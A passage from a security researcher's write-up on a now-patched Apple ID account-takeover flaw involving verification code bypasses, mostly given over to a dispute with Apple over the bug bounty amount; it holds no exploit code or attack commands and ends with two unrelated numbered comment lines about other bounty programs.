- We could take over all Apple IDs not associated with a passcode-protected Apple device, due to both the SMS and email verification code bypasses. That means: any Apple device without a passcode or password (anyone who turned off or never set one), and any Apple ID created without an Apple device, such as in a browser or in an Android app, never used on a password-protected Apple device. For example, 50 million+ Android users have downloaded the Apple Music app, and the majority of them may never have used an Apple device. They are still Apple users, and their information, like credit cards, billing address and subscription details, could be exposed.

They need not have rewarded the upper cap for iCloud account takeover ($100K), but it should at least have been close to it, considering the impact. After all my hard work and almost a year of waiting, I didn't get what I deserved, because of Apple's unfair judgement. So I refused to receive the bounty and told them it was unfair.
I asked them to reconsider the bounty decision or let me publish the report with all the information. There wasn't any response to my emails, so I decided to publish my article without waiting indefinitely for their response. Therefore, I shared my research with Apple for FREE instead of for an unfair price. I ask the Apple security team to be more transparent and fair, at least in the future.

I would like to thank Apple for patching the vulnerability. I repeat: the vulnerability is completely fixed, and the scenarios described above no longer work.

Thank you for reading the article! Please let me know your thoughts in the comments.

Source: https://thezerohack.com/apple-vulnerability-bug-bounty
24. Venmo, Xoom, Braintree Payments, Swift Financial / LoanBuilder, Hyperwallet. These are in scope in their bug bounty program.
25. Honestly, I'm satisfied with what I received. Compared to others, what more can I say. 😅